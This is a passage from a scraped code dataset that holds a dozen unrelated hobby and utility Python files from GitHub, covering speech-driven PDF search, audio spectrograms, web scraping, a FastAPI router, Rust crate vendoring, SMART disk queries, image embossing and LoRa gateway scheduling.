sr.Microphone() as source:\n r.adjust_for_ambient_noise(source)\n r.energy_threshold = 200\n r.pause_threshold = 0.5\n \n while True:\n speak(\"What would you like to research about?\")\n audio = r.listen(source, timeout=10)\n query = r.recognize_google(audio)\n \n approval = _approve(query) # Add the approval check\n \n if approval:\n break\n else:\n speak(\"Sorry, the query you provided is not approved. Please try again.\")\n except sr.WaitTimeoutError:\n print(\"Timeout error: the speech recognition operation timed out\")\n except sr.UnknownValueError:\n speak(\"Sorry, I could not understand your query. Please try again.\")\n except sr.RequestError as e:\n speak(f\"Could not request results from the speech recognition service; check your internet connection: {e}\")\n except Exception as e:\n speak(f\"An error occurred: {e}\")\n \n return re.sub(r'(?u)[^-\\w.]', '', query)\n\n\ndef download_pdf_files(max_results=4, base_directory='./pdfs'):\n keyword = sanitize_and_get_user_query()\n\n today = datetime.today().strftime('%Y-%m-%d')\n directory = os.path.join(base_directory, today)\n os.makedirs(directory, exist_ok=True)\n\n query = keyword + \" filetype:pdf\"\n speak(\"Initializing downloads from the internet. This may take sometime depending on your internet speed. in the meantime relax and wait for response.\")\n for url in search(query, num_results=max_results):\n try:\n response = requests.get(url, timeout=15)\n except requests.exceptions.RequestException as err:\n print(f\"Couldn't download file {url}. Error: {err}\")\n continue\n\n if response.headers['content-type'] == 'application/pdf':\n filename = os.path.basename(url)\n if not os.path.isfile(os.path.join(directory, filename)):\n try:\n with open(os.path.join(directory, filename), 'wb') as f:\n f.write(response.content)\n speak(f\"Downloaded {filename}\")\n except Exception as err:\n print(f\"Couldn't write file {filename}. 
Error: {err}\")\n continue\n\n speak(f\"Downloaded files successfully\")\n\n# if __name__ == \"__main__\":\n# download_pdf_files(max_results=15)\n","repo_name":"marvins56/GPT-4-BLIND-PERSONS","sub_path":"hackathon/newSerach.py","file_name":"newSerach.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31943681589","text":"import scipy.io.wavfile as wav\r\nimport matplotlib.pyplot as plt\r\n\r\nimport numpy as np\r\nfrom scipy.fftpack import fft\r\n\r\n\r\n# 输出音频波形\r\nfilepath = 'test.wav'\r\n#fs采样频率 wavsigal音频数据\r\nfs, wavsignal = wav.read(filepath)\r\nprint(type(wavsignal))\r\nprint(wavsignal.shape)\r\nplt.plot(wavsignal)\r\nplt.show()\r\n\r\n#构造hamming window\r\nx=np.linspace(0, 400 - 1, 400, dtype = np.int64)#返回区间内的均匀数字\r\n# print(x)\r\nw = 0.54 - 0.46 * np.cos(2 * np.pi * (x) / (400 - 1))\r\nplt.plot(w)\r\nplt.show()\r\n\r\n#对数据分帧\r\n'''\r\n帧长: 25ms\r\n帧移: 10ms\r\n采样点(s) = fs\r\n采样点(ms)= fs / 1000\r\n采样点(帧)= fs / 1000 * 帧长\r\n'''\r\ntime_window = 25\r\nwindow_length = fs // 1000 * time_window\r\n#保持window\r\n\r\n# 分帧\r\np_begin = 0\r\np_end = p_begin + window_length\r\nframe = wavsignal[p_begin:p_end]\r\n\r\nplt.figure(figsize=(15, 5))\r\nax4 = plt.subplot(121)\r\nplt.title('the original picture of one frame')\r\nplt.plot(frame)\r\n\r\n# plt.show()\r\n# 加窗\r\n\r\nframe = frame * w\r\nax5 = plt.subplot(122)\r\nplt.title('after hanmming')\r\nplt.plot(frame)\r\nplt.show()\r\n\r\n# 进行快速傅里叶变换\r\nframe_fft = np.abs(fft(frame))[:200]\r\nplt.plot(frame_fft)\r\nplt.show()\r\n\r\n# 取对数,求db\r\nframe_log = np.log(frame_fft)\r\nplt.plot(frame_log)\r\nplt.show()\r\n\r\n# 获取信号的时频图\r\ndef compute_fbank(file):\r\n x=np.linspace(0, 400 - 1, 400, dtype = np.int64)\r\n # 汉明窗\r\n w = 0.54 - 0.46 * np.cos(2 * np.pi * (x) / (400 - 1) )\r\n fs, wavsignal = wav.read(file)\r\n # wav波形 加时间窗以及时移10ms\r\n time_window = 25 # 单位ms\r\n # 计算窗长度的公式,目前全部为400固定值\r\n window_length = fs / 1000 * time_window\r\n wav_arr = np.array(wavsignal)\r\n wav_length = len(wavsignal)\r\n # 计算循环终止的位置,也就是最终生成的窗数\r\n range0_end = int(len(wavsignal)/fs*1000 - time_window) // 10\r\n # \tprint(range0_end)\r\n # 用于存放最终的频率特征数据\r\n data_input = np.zeros((range0_end, 200), dtype = np.float)\r\n # 窗口内的数据\r\n data_line = np.zeros((1, 400), dtype = np.float)\r\n for i in range(0, range0_end):\r\n p_start = i * 160 # 步长10ms\r\n p_end = p_start + 400 # 窗口长25ms\r\n data_line = wav_arr[p_start:p_end]\r\n data_line = data_line * w # 加窗\r\n data_line = np.abs(fft(data_line))\r\n data_input[i]=data_line[0:200] # 设置为400除以2的值(即200)是取一半数据,因为是对称的\r\n data_input = np.log(data_input + 1)\r\n #data_input = data_input[::]\r\n return data_input\r\n\r\n\r\n\r\n\r\na = compute_fbank(filepath)\r\nprint(a.shape)\r\nplt.imshow(a.T, origin = 'lower')\r\nplt.show()\r\n","repo_name":"Michelingweo/Audio-Recognition","sub_path":"timefreqfig.py","file_name":"timefreqfig.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23890101415","text":"import sys\nfrom config import DB_DETAILS\nfrom util import get_tables\ndef main():\n \"\"\"Pass one argument\"\"\"\n env = sys.argv[1]\n db_details = DB_DETAILS[env]\n tables = get_tables('table_list')\n for table in tables['table_name']:\n print(table)\n # print(idx)\nif __name__ == '__main__':\n 
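# --- Editor's note: the comments in timefreqfig.py above are in Chinese; they describe
# a standard log spectrogram: 25 ms frames with a 10 ms shift, Hamming windowing, an FFT
# per frame (keeping one symmetric half), then a log scale. A quick check of the framing
# constants, assuming the common fs = 16000 Hz (the hard-coded 160-sample hop implies it):
fs = 16000                                   # assumed sample rate
window_length = fs // 1000 * 25              # 400 samples per 25 ms frame
hop = fs // 1000 * 10                        # 160 samples per 10 ms hop
n_frames_1s = int(16000 / fs * 1000 - 25) // 10   # frames in 1 s, per range0_end above
print(window_length, hop, n_frames_1s)       # 400 160 97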
main()","repo_name":"Kamal-byte/data-copier-live","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9300114383","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 27 11:31:17 2019\r\n\r\n@author: kjoseph\r\n\"\"\"\r\n\r\nimport pandas as pd\r\n#import numpy as np\r\nimport glob\r\n#import xlwt\r\n#from xlwt import Workbook\r\n#from openpyxl import load_workbook\r\n\r\n\r\nfiles=glob.glob('D:\\\\Test\\\\*.xlsx')## Change Input Location Here. Dont change wildcard operator *.xlsx\r\n\r\n\r\nsheets=['DemandRegion','DemandRequirement','Facility','FacilityInPeriod','InterfacilityLinkInPeriod','ProcessComponent',\r\n 'ProductAtFacilityInPeriod','ServiceLinkInPeriod','TransportationMode','TransportationModeInPeriod']\r\nfile_names=[i[i.find('Scenario'):i.find('.xlsx')] for i in files ]\r\n\r\n\r\nd= ['D:\\\\Test\\\\Answers' for i in file_names]## Give Ouput Location Here\r\n\r\n\r\ntarget=list(map(lambda x,y:x+'\\\\'+y,d,file_names))\r\ntarget=[i+'.xlsx' for i in target]\r\n\r\nl=len(sheets)\r\ncount=0\r\nfor j in files:\r\n #wb=Workbook()\r\n with pd.ExcelWriter(target[count],engine='xlsxwriter') as writer:\r\n for i in sheets:\r\n data=pd.read_excel(j,sheet_name=i)\r\n data.Scenario=data.loc[:,'Scenario'].apply(lambda x:file_names[count])\r\n data.to_excel(writer,sheet_name=i,index=False)\r\n count=count+1\r\n # break\r\n\r\n","repo_name":"KaranJoseph/Chain-SCD","sub_path":"Test/scd.py","file_name":"scd.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11371944307","text":"from models.databasemanager import DatabaseManager\r\nfrom datetime import date , datetime\r\nfrom extract import Extract\r\n\r\ndb_manager = DatabaseManager()\r\n\r\n\r\nclass Extract_Scheduled(Extract):\r\n def __init__(self, money , day):\r\n super().__init__(money)\r\n self.day = day\r\n\r\n def insert_database(self):\r\n\r\n query = \"INSERT INTO moneyscheduled (money, day) VALUES (%s, %s)\"\r\n data = (self.money , self.day)\r\n\r\n db_manager.execute_query_with_data(query , data)\r\n\r\n print(\"dinheiro programado adicionado\")\r\n\r\n def view_date_moneyscheduled():\r\n\r\n\r\n query = \"SELECT * FROM moneyscheduled\"\r\n results = db_manager.return_results(query)\r\n\r\n return results\r\n\r\n def count_register_moneyscheduled():\r\n query = \"SELECT COUNT(money) FROM moneyscheduled\"\r\n results = db_manager.return_results(query)\r\n\r\n return results[0][0]\r\n\r\n \r\n def add_money_moneyscheduled (money, scheduling, count_register):\r\n count_register_loop = count_register - 1\r\n\r\n # Toda vez que o dia da adição de dinheiro progrmada pelo usuário for hoje, adicione as 00:10 do dia\r\n for i in range(0 , count_register_loop , 1):\r\n if(scheduling[i][1] == date.today().day and datetime.now().hour == 0 and datetime.now().minute == 10 and datetime.now().second == 0):\r\n new_extract = scheduling[i][0]\r\n add_new_extract = new_extract + money\r\n \r\n \r\n query = \"UPDATE extract SET bankroll = %s WHERE id = %s\"\r\n data = ( add_new_extract , 0)\r\n\r\n\r\n db_manager.execute_query_with_data(query , data)\r\n \r\n return \"Dinheiro programado adicionado!\"\r\n\r\n \r\n\r\n \r\n 
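# --- Editor's sketch (hedged, file names hypothetical): the per-scenario copy pattern
# used in scd.py above -- one ExcelWriter per output file, each listed sheet streamed
# through read_excel -> stamp the Scenario column -> to_excel.
import pandas as pd

src, dst = "Scenario1.xlsx", "Answers/Scenario1.xlsx"
sheets = ["DemandRegion", "Facility"]
with pd.ExcelWriter(dst, engine="xlsxwriter") as writer:
    for sheet in sheets:
        df = pd.read_excel(src, sheet_name=sheet)
        df["Scenario"] = "Scenario1"                       # overwrite with the scenario name
        df.to_excel(writer, sheet_name=sheet, index=False)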
\r\n\r\n","repo_name":"Darlan-Almeida/controle_de_gastos","sub_path":"controle_de_gastos/extract_scheduled.py","file_name":"extract_scheduled.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39979370697","text":"#! /home/nathan/.virtualenvs/rollem/bin/python\nimport sys\nimport logging\nfrom telegram.ext import Updater, CommandHandler\n\ndef roll(bot, update):\n bot.send_message(chat_id=update.message.chat_id, text=\"Technical difficulties. Working on a fix now!\")\n\nTOKEN = sys.argv[1]\n\nupdater = Updater(token=TOKEN)\ndispatcher = updater.dispatcher\n\nroll_handler = CommandHandler('roll', roll)\ndispatcher.add_handler(roll_handler)\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nupdater.start_polling()\n","repo_name":"treetrnk/rollem-telegram-bot","sub_path":"tech-diff.py","file_name":"tech-diff.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"74654418434","text":"from fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\n\nfrom ..enums import QuestionType\nfrom ..schemas.question import QuestionItemResponse, QuestionResponse\nfrom ..database.engine import get_db\nfrom ..helpers import question_crud, answer_crud\n\nrouter = APIRouter(\n prefix=\"/question\",\n tags=[\"question\"]\n)\n\n\n@router.get('/', response_model=list[QuestionItemResponse])\ndef get_questions(test_id: int | None = None, db: Session = Depends(get_db)):\n if test_id:\n return question_crud.get_questions_by_test_id(db, test_id)\n return question_crud.get_questions(db)\n\n\n@router.get('/{question_id}', response_model=QuestionResponse)\ndef get_question(question_id: int, test_id: int | None = None, db: Session = Depends(get_db)):\n question = question_crud.get_question_by_id(db, question_id)\n stats = {}\n if question.type != QuestionType.Text.value:\n stats = answer_crud.get_answers_count(db, question, test_id)\n\n return QuestionResponse(\n text=question.text,\n type=question.type,\n stats=stats if len(stats.keys()) != 0 else None\n )\n","repo_name":"frake23/moodle-analyzer","sub_path":"server/app/routers/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4038560460","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport logging\n#from scrapy.shell import inspect_response\n#from scrapy.urils.response import open_in_browser\n\n\nclass CountriesSpider(scrapy.Spider):\n name = 'countries'\n allowed_domains = ['www.worldometers.info']\n start_urls = [\n 'https://www.worldometers.info/world-population/population-by-country/']\n #country_name = ''\n\n def parse(self, response):\n countries = response.xpath(\"//td/a\")\n\n for country in countries:\n name = country.xpath(\".//text()\").get()\n # self.country_name = name\n link = country.xpath(\".//@href\").get()\n\n # absoulute_url = f\"https://www.worldometers.info{link}\"\n # absoulute_url = response.urljoin(link)\n\n # yield scrapy.Request(url=absoulute_url)\n # callback 추가 시 , 크롤링 후 callback 실행\n # meta 추가 시, callback에 전달됨.\n yield response.follow(url=link, callback=self.parse_country, meta={'country_name': name})\n\n def parse_country(self, response):\n # inspect_response(response, self) # debugging\n # open_in_brower(response)\n # 
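# --- Editor's notes: the Portuguese strings in extract_scheduled.py above read
# "scheduled money added" / "Scheduled money added!". Separately, the FastAPI router
# above receives its Session through Depends(get_db); the project's database.engine
# module is not shown here, but the conventional implementation is a generator
# dependency like this sketch (SessionLocal and the connection URL are assumed names,
# not taken from the source):
from sqlalchemy import create_engine
from sqlalchemy.orm import Session, sessionmaker

engine = create_engine("sqlite:///./app.db")
SessionLocal = sessionmaker(bind=engine, autoflush=False)

def get_db():
    db: Session = SessionLocal()
    try:
        yield db        # FastAPI runs the request with this session...
    finally:
        db.close()      # ...and closes it once the response is sent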
loggin.warning(response.status)\n name = response.request.meta['country_name']\n rows = response.xpath(\n \"(//table[@class='table table-striped table-bordered table-hover table-condensed table-list'])[1]/tbody/tr\")\n for row in rows:\n year = row.xpath(\".//td[1]/text()\").get()\n population = row.xpath(\".//td[2]/strong/text()\").get()\n yield {\n # 'name': self.country_name,\n 'country_name': name,\n 'year': year,\n 'population': population\n }\n\n# DataSet 출력하기\n# scrapy crawl countries -o population_dataset.json\n# scrapy crawl countries -o population_dataset.csv\n","repo_name":"jinkstudy/crawling_scrapy","sub_path":"worldometers/worldometers/spiders/countries.py","file_name":"countries.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19777884959","text":"#!/usr/bin/python3\n\"\"\"Vendor PyCA cryptography's Rust crates\n\"\"\"\nimport argparse\nimport os\nimport re\nimport tarfile\nimport tempfile\nimport shutil\nimport subprocess\nimport sys\n\nVENDOR_DIR = \"vendor\"\nCARGO_TOML = \"src/rust/Cargo.toml\"\nRE_VERSION = re.compile(\"Version:\\s*(.*)\")\n\nparser = argparse.ArgumentParser(description=\"Vendor Rust packages\")\nparser.add_argument(\n \"--spec\", default=\"python-cryptography.spec\", help=\"cryptography source tar bundle\"\n)\n\n\ndef cargo(cmd, manifest):\n args = [\"cargo\", cmd, f\"--manifest-path={manifest}\"]\n return subprocess.check_call(\n args, stdout=subprocess.DEVNULL, stderr=sys.stderr, env={}\n )\n\n\ndef tar_reset(tarinfo):\n \"\"\"Reset user, group, mtime, and mode to create reproducible tar\"\"\"\n tarinfo.uid = 0\n tarinfo.gid = 0\n tarinfo.uname = \"root\"\n tarinfo.gname = \"root\"\n tarinfo.mtime = 0\n if tarinfo.type == tarfile.DIRTYPE:\n tarinfo.mode = 0o755\n else:\n tarinfo.mode = 0o644\n if tarinfo.pax_headers:\n raise ValueError(tarinfo.name, tarinfo.pax_headers)\n return tarinfo\n\n\ndef tar_reproducible(tar, basedir):\n \"\"\"Create reproducible tar file\"\"\"\n\n content = [basedir]\n for root, dirs, files in os.walk(basedir):\n for directory in dirs:\n content.append(os.path.join(root, directory))\n for filename in files:\n content.append(os.path.join(root, filename))\n content.sort()\n\n for fn in content:\n tar.add(fn, filter=tar_reset, recursive=False, arcname=fn)\n\n\ndef main():\n args = parser.parse_args()\n spec = args.spec\n\n # change cwd to work in bundle directory\n here = os.path.dirname(os.path.abspath(spec))\n os.chdir(here)\n\n # extract version number from bundle name\n with open(spec) as f:\n for line in f:\n mo = RE_VERSION.search(line)\n if mo is not None:\n version = mo.group(1)\n break\n else:\n raise ValueError(f\"Cannot find version in {spec}\")\n\n bundle_file = f\"cryptography-{version}.tar.gz\"\n vendor_file = f\"cryptography-{version}-vendor.tar.gz\"\n\n # remove existing vendor directory and file\n if os.path.isdir(VENDOR_DIR):\n shutil.rmtree(VENDOR_DIR)\n try:\n os.unlink(vendor_file)\n except FileNotFoundError:\n pass\n\n print(f\"Getting crates for {bundle_file}\", file=sys.stderr)\n\n # extract tar file in tempdir\n # fetch and vendor Rust crates\n with tempfile.TemporaryDirectory(dir=here) as tmp:\n with tarfile.open(bundle_file) as tar:\n tar.extractall(path=tmp)\n manifest = os.path.join(tmp, f\"cryptography-{version}\", CARGO_TOML)\n cargo(\"fetch\", manifest)\n cargo(\"vendor\", manifest)\n\n print(\"\\nCreating tar ball...\", file=sys.stderr)\n with tarfile.open(vendor_file, \"x:gz\") as tar:\n 
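# --- Editor's notes: the commented-out debug line above misspells `logging` as `loggin`,
# and the Korean comments explain that callback= runs after the crawl and that meta is
# forwarded to the callback. On Scrapy >= 1.7 the same hand-off can use cb_kwargs, which
# delivers the value as a plain keyword argument (hedged sketch, simplified selectors):
import scrapy

class CountriesKwargsSpider(scrapy.Spider):
    name = "countries_kwargs"
    start_urls = ["https://www.worldometers.info/world-population/population-by-country/"]

    def parse(self, response):
        for country in response.xpath("//td/a"):
            yield response.follow(
                url=country.xpath(".//@href").get(),
                callback=self.parse_country,
                cb_kwargs={"country_name": country.xpath(".//text()").get()},
            )

    def parse_country(self, response, country_name):       # cb_kwargs arrive as arguments
        for row in response.xpath("//table[1]/tbody/tr"):  # simplified, hypothetical xpath
            yield {
                "country_name": country_name,
                "year": row.xpath(".//td[1]/text()").get(),
                "population": row.xpath(".//td[2]/strong/text()").get(),
            }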
tar_reproducible(tar, VENDOR_DIR)\n\n # remove vendor dir\n shutil.rmtree(VENDOR_DIR)\n\n parser.exit(0, f\"Created {vendor_file}\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"theforeman/pulpcore-packaging","sub_path":"packages/python-cryptography/vendor_rust.py","file_name":"vendor_rust.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24867362267","text":"#!/usr/bin/env python2.7\nimport os\nimport re\nfrom subprocess import check_output, check_call, CalledProcessError\n\nINFO_FIELD_MAP = {\n 'model_family': 'family',\n 'device_model': 'model',\n 'lu_wwn_device_id': 'wwn',\n 'user_capacity': 'capacity',\n 'serial_number': 'serial',\n 'firmware_version': 'firmware',\n}\n\ntry:\n with open(os.devnull, 'w') as devnull:\n check_call(['which', 'smartctl'], stdout=devnull, stderr=devnull)\n\n try:\n i = 0\n attr_i = 0\n\n for devline in check_output(['smartctl', '--scan']).split(\"\\n\"):\n try:\n parts = re.split(r'\\s+', devline.strip())\n\n if len(parts):\n device = parts[0]\n devtype = None\n\n if len(parts) >= 3:\n devtype = parts[2]\n\n with open(os.devnull, 'w') as devnull:\n smartout = check_output([\n 'smartctl', '-i', '-A', device,\n ], stderr=devnull).split(\"\\n\")\n\n print(\"disk.smart.{}.device:str:{}\".format(i, device))\n\n if devtype:\n print(\"disk.smart.{}.device_type:str:{}\".format(i, devtype))\n\n in_section_info = False\n in_section_data = False\n\n for line in smartout:\n try:\n if 'INFORMATION SECTION' in line.upper():\n in_section_info = True\n in_section_data = False\n\n elif 'DATA SECTION' in line.upper():\n in_section_info = False\n in_section_data = True\n\n elif in_section_info:\n field, value = re.split(r':\\s+', line.strip(), 1)\n field = re.sub(r'\\s+', '_', field.lower())\n value = value.strip()\n dtype = 'str'\n\n if field == 'user_capacity':\n value = re.sub(r'\\s+bytes.*$', '', value)\n value = int(value.replace(',', ''))\n dtype = 'int'\n\n elif field == 'lu_wwn_device_id':\n value = re.sub(r'\\s+', '', value)\n\n if field in INFO_FIELD_MAP:\n key = INFO_FIELD_MAP[field]\n\n print(\"disk.smart.{}.{}:{}:{}\".format(i, key, dtype, value))\n\n elif in_section_data and re.match(r'^\\s*\\d+\\s', line):\n attr_id, attr_name, flag, value, worst, threshold, attr_type, updated, \\\n when_failed, raw = re.split(r'\\s+', line.strip(), 9)\n\n attr_name = attr_name.lower()\n attr_type = attr_type.lower()\n updated = updated.lower()\n\n if when_failed == '-':\n when_failed = None\n\n print(\"disk.smart.{}.attributes.{}.id:str:attr-{}\".format(i, attr_i, attr_id))\n print(\"disk.smart.{}.attributes.{}.name:str:{}\".format(i, attr_i, attr_name))\n print(\"disk.smart.{}.attributes.{}.flag:int:{}\".format(i, attr_i, int(flag, 16)))\n print(\"disk.smart.{}.attributes.{}.value:int:{}\".format(i, attr_i, int(value)))\n print(\"disk.smart.{}.attributes.{}.raw_value:int:{}\".format(i, attr_i, int(raw)))\n print(\"disk.smart.{}.attributes.{}.worst:int:{}\".format(i, attr_i, int(worst)))\n print(\"disk.smart.{}.attributes.{}.threshold:int:{}\".format(i, attr_i, int(threshold)))\n print(\"disk.smart.{}.attributes.{}.type:str:{}\".format(i, attr_i, attr_type))\n print(\"disk.smart.{}.attributes.{}.update_freq:str:{}\".format(i, attr_i, updated))\n\n if when_failed:\n print(\"disk.smart.{}.attributes.{}.when_failed:str:{}\".format(i, attr_i, when_failed))\n\n attr_i += 1\n\n except:\n continue\n\n i += 1\n\n except:\n continue\n\n except:\n pass\n\nexcept 
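# --- Editor's sketch (hedged, paths hypothetical): the determinism trick behind
# tar_reset()/tar_reproducible() above -- zero out uid/gid/mtime, normalize owner names
# and modes, and add members in a stable sorted order so the tar content does not vary
# between runs or machines (the gzip layer still stamps its own timestamp).
import tarfile

def reset(ti: tarfile.TarInfo) -> tarfile.TarInfo:
    ti.uid = ti.gid = ti.mtime = 0
    ti.uname = ti.gname = "root"
    ti.mode = 0o755 if ti.isdir() else 0o644
    return ti

with tarfile.open("demo-vendor.tar.gz", "w:gz") as tar:
    tar.add("vendor", filter=reset)   # recursive add walks entries in sorted order on 3.7+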
CalledProcessError:\n os.exit(0)\n","repo_name":"ghetzel/sysfact","sub_path":"shell.d/smart.py","file_name":"smart.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72565605314","text":"from functools import reduce\n\nclass Solution:\n def numSubarrayProductLessThanK(self, nums: List[int], k: int) -> int:\n \n list_of_subarry = []\n \n for i in range(len(nums)):\n \n for j in range(i, len(nums)):\n \n sub_array = nums[i:j+1]\n if reduce( operator.mul, sub_array, 1 ) < k:\n list_of_subarry.append( sub_array )\n \n \n return len(list_of_subarry)","repo_name":"brianchiang-tw/leetcode","sub_path":"No_0713_Subarray Product Less Than K/subarray_product_less_than_k_by_naive_Time Limit Exceed.py","file_name":"subarray_product_less_than_k_by_naive_Time Limit Exceed.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"1538740767","text":"#_*_coding:utf-8_*_\nimport os.path,glob,os\nimport numpy as np\nfrom PIL import Image\n\ndef make_rp(i):\n im = np.array(Image.open(i).convert(\"L\"))\n a = np.asarray(im).astype('float')\n vec_el = np.pi / 2.2 # 光源的俯视角度,弧度值\n vec_az = np.pi / 4 # 光源的方位角度,弧度值\n depth = 10.\n grad = np.gradient(a) # 取图像灰度的梯度值\n grad_x, grad_y = grad # 分别取横纵图像梯度值\n grad_x = grad_x * depth / 100.\n grad_y = grad_y * depth / 100.\n dx = np.cos(vec_el) * np.cos(vec_az) # 光源对X轴的影响\n dy = np.cos(vec_el) * np.sin(vec_az) # 光源对Y轴的影响\n dz = np.sin(vec_el) # 光源对Z轴的影响\n A = np.sqrt(grad_x ** 2 + grad_y ** 2 + 1.)\n uni_x = grad_x / A\n uni_y = grad_y / A\n uni_z = 1. / A\n a1 = 255 * (dx * uni_x + dy * uni_y + dz * uni_z) # 光源归一化\n a1 = a1.clip(0, 255)\n im1 = Image.fromarray(a1.astype('uint8')) # 重构图像\n return im1\n\ndef make_p(i):\n print('共' + str(s) + '张,现在是第' + str(k) + '张')\n out = 'py_' + os.path.basename(i)\n make_rp(i).save(ps_out+out)\n\ndef face():\n pf = str(input('输入文件夹路径:(-1结束)'))\n if pf == '-1':\n return '-1'\n return pf\n\n\nif __name__ == '__main__':\n pf = '1'\n while pf != '-1':\n pf = face()\n if pf=='-1':\n break\n if os.path.exists(pf):\n if pf[-1] != '\\\\':\n pf = pf + '\\\\'\n pfs = glob.glob(pf + '*.jpg') + glob.glob(pf + '*.png') + glob.glob(pf + '*.gif') + glob.glob(pf + '*.jpeg')\n ps_out = pf + 'py_out\\\\'\n s = len(pfs)\n k = 1\n if not os.path.exists(ps_out):\n os.mkdir(ps_out)\n for i in pfs:\n make_p(i)\n k += 1\n print('-' * 20 + '完成(from 杜章定1163829941)')\n else:\n print('文件夹不存在!!')\n","repo_name":"DLABDE/weather_cube","sub_path":"pic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72905982913","text":"# implementation of Light algorithm (gateway side)\n# \"Offline scheduling algorithms for time-slotted lora-based bulk data transmission\"\n# author: Dimitris Zorbas (dimzorbas@ieee.org)\n#\n# Distributed under GNU GPLv3\n\nimport socket\nimport struct\nfrom network import LoRa\nfrom network import WLAN\nimport ubinascii\nimport pycom\nimport time\nimport uos\nfrom machine import Timer\nimport math\n\npycom.heartbeat(False)\noff = 0x000000\nred = 0x7f0000\ngreen = 0x007f00\nblue = 0x00007f\nwhite = 0xFFFAFA\n\nwlan = WLAN(mode=WLAN.STA)\nif not wlan.isconnected():\n wlan.connect('ssid', auth=(WLAN.WPA2, 'password'), timeout=5000)\n while not wlan.isconnected():\n machine.idle()\n\nprint 
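# --- Editor's notes: the smart.py record above ends with `os.exit(0)`, which does not
# exist -- `sys.exit(0)` (or `os._exit(0)`) was almost certainly intended. The Chinese
# comments in pic/main.py describe an emboss/relief effect: take the grayscale gradient,
# weight it by a light source at given elevation/azimuth angles, normalize, and rebuild
# the image. Separately, the Leetcode solution above is the O(n^2) brute force that its
# filename admits exceeds the time limit; the standard O(n) sliding window -- a different
# technique, assuming the problem's nums[i] >= 1 constraint -- looks like this sketch:
from typing import List

def num_subarray_product_less_than_k(nums: List[int], k: int) -> int:
    if k <= 1:
        return 0
    count, prod, left = 0, 1, 0
    for right, x in enumerate(nums):
        prod *= x
        while prod >= k:            # shrink the window until its product drops below k
            prod //= nums[left]
            left += 1
        count += right - left + 1   # all subarrays ending at `right` that start >= left
    return count

assert num_subarray_product_less_than_k([10, 5, 2, 6], 100) == 8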
(ubinascii.hexlify(wlan.mac(),':').decode())\nprint(\"I got IP\"+wlan.ifconfig()[0])\n\n_LORA_PKG_FORMAT = \"!BB%ds\"\n_LORA_INIT_FORMAT = \"!BBs\"\n_LORA_RCV_PKG_FORMAT = \"!BB%ds\"\nMY_ID = 0x01\nmy_sf = int(MY_ID) + 6\nmy_bw_index = 2\n(guard, sync_method, sync_rate) = (40, 1, 1)\nfreqs = [865000000, 865600000, 866200000, 866800000, 867400000, 868000000] # my channels\nairtime = [[0.174336, 0.087168, 0.043584], [0.307712, 0.153856, 0.076928], [0.553984, 0.276992, 0.138496], [1.026048, 0.513024, 0.256512], [2.215936, 0.944128, 0.472064], [3.940352, 1.724416, 0.862208]]\nif (my_bw_index == 0):\n my_bw = LoRa.BW_125KHZ\nelif (my_bw_index == 1):\n\tmy_bw = LoRa.BW_250KHZ\nelif (my_bw_index == 2):\n my_bw = LoRa.BW_500KHZ\nmy_node_list = [11, 12, 13, 14, 15, 16, 17, 18, 19, 20] # my node ids\n\nwhile (True):\n # connect to the network server via wifi and receive the schedule\n pycom.rgbled(green)\n host = '192.168.0.'+str(int(MY_ID))\n port = 8000\n wlan_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"socket created\")\n wlan_s.bind((host, port))\n wlan_s.listen(5)\n conn, addr = wlan_s.accept()\n print('Got connection from', addr)\n data = conn.recv(512)\n data = str(data)[2:]\n data = data[:-1]\n if (len(data) > 30): # get some info + the schedule\n (guard, sync_method, sync_rate, data) = str(data).split(\":\")\n data = str(guard)+\":\"+str(sync_rate)+\":\"+str(data) # send in sting mode (I'll change this later)\n print(data)\n wlan_s.close()\n guard = int(guard)\n sync_method = int(sync_method)\n sync_rate = int(sync_rate)\n airt = airtime[my_sf-7][my_bw_index]*1000\n round_length = int(math.ceil(100*airt/(airt + 2*guard))*(airt + 2*guard))\n print(\"round length =\", round_length)\n\n # send the schedule to the nodes (let's use SF12)\n print(\"start with lora...\")\n lora = LoRa(mode=LoRa.LORA, tx_iq=True, frequency=freqs[0], region=LoRa.EU868, power_mode=LoRa.ALWAYS_ON, bandwidth=my_bw, sf=12, tx_power=14)\n lora_sock = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n lora_sock.setblocking(False)\n pkg = struct.pack(_LORA_PKG_FORMAT % len(data), MY_ID, len(data), data)\n print(pkg)\n while (lora.ischannel_free(-100) == False):\n time.sleep_ms(100)\n 